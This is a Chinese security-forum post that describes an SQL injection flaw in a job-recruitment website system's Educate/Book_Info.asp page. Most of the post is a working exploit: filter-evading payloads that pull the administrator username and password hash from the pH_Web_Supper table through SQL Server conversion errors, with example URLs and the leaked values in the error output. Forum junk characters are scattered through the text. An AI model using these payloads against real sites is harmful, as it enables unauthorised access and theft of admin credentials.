找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2247|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
( h. e5 P! c! {* ^
  \9 Y. i8 o- f" D8 F此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出. W7 @" C# f( H9 ~, W" v6 O5 ~+ R
7 t# z; m; j- _
exp:如下
. V5 X. e0 Y' _查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)' u$ l! ]* R! Q5 J# ~
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)# B1 c9 ]  G2 Q6 P! M

) P& D$ S  e2 V9 m* r6 rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)% X5 c/ ~/ f7 h" k- Z9 L% x; o

) d% O( u, c! e3 M2 F- t+ |9 U1 vMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
! i- G" ]2 Z0 ^1 I  E& A& K : |1 L" H& u! [2 u# E- p! G2 ]  t8 w1 p
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
. k* n  `- w% j8 {. d
7 Q- ^# o& S$ k/Educate/Book_Info.asp,行 8
2 T1 S$ \) t! e8 [! ^
/ z6 z5 q1 a9 i& a, C8 l/ P: dhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 L4 H8 l, J: c' h5 r8 D; `
' n3 x8 P: R# t8 p1 nMicrosoft OLE DB Provider for SQL Server 错误 '80040e07': E: h; D7 {/ |2 i  N9 c- q

8 h. Z* _. R( p; \" G1 E" ^将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。& M: ~. t1 k( M! z( ?; G* `/ w

4 h! M; w6 j3 T9 O% V8 t% w8 l3 y/Educate/Book_Info.asp,行 83 p  F, e; m9 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表